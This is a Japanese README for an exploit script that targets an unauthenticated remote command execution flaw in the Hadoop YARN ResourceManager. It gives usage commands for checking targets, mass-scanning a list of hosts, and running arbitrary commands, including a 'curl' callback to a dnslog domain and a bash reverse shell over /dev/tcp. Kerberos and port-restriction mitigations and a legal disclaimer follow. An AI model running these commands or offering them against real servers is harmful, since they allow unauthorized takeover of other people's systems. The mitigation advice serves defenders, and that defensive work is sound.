
Hadoop YARN ResourceManager 未認証RCE
Hadoop yarn ResourceManager には未承認アクセスの脆弱性が存在しました。この脆弱性は、Hadoop のコアコンポーネントである Hadoop yarn に存在していました。Hadoop yarn はデフォルトで RPC サービスを外部に公開していたため、リモートの攻撃者はこの未承認の脆弱性を悪用して、RPC サービスを介して任意のコマンドを実行し、対象サーバーを制御することができました。この脆弱性はリスクが高く、被害も大きいこと、また詳細がすでに公開され、攻撃者によって悪用されていることを踏まえ、Apache Hadoop を使用しているすべてのユーザーは自己点検を実施し、速やかにセキュリティ対策を講じることをお勧めします。
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
1.未承認アクセスを防ぐために Kerberos 認証を有効にしてください。
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
2.外部アドレスが Hadoop RPC サービス関連ポートにアクセスすることを禁止するか、信頼できるアドレスのみに開放するよう設定してください。
厳重に宣言します: このツールを違法な操作に使用しないでください。このツールは、甲側および乙側の担当者が安全自己点検を行うためにのみ使用されます。ユーザーが違法に使用した場合、法的責任はユーザーが負うものとします!!!